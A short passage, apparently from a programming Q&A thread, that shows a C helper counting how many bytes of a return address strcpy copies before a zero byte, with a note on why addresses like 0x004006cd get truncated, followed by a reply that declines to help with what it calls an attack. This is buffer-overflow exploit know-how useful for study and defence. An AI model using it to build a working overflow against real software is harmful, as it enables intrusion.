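 * copy before it hits a zero byte (4 means the whole address survives). */
size_t bytes_copied_before_nul(uint32_t addr)
{
    size_t n = 0;
    while (n < 4 && ((addr >> (8 * n)) & 0xffu) != 0)
        n++;
    return n;
}
```

An address such as 0x08048449 gives 4, so strcpy can deliver it intact. An address such as 0x004006cd gives 3, because its top byte is zero and strcpy stops there.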
This is not possible - it would be possible, if you know the compiler and how it works, the generated assembler code, the used libraries, the architecture, the cpu, the system environment and the lotto numbers of tomorrow - and if you had this knowledge, you would be clever enough not to ask. The only scenario where it would make sense is when someone tries some kind of attack, and do not expect that someone is willing to help you with it.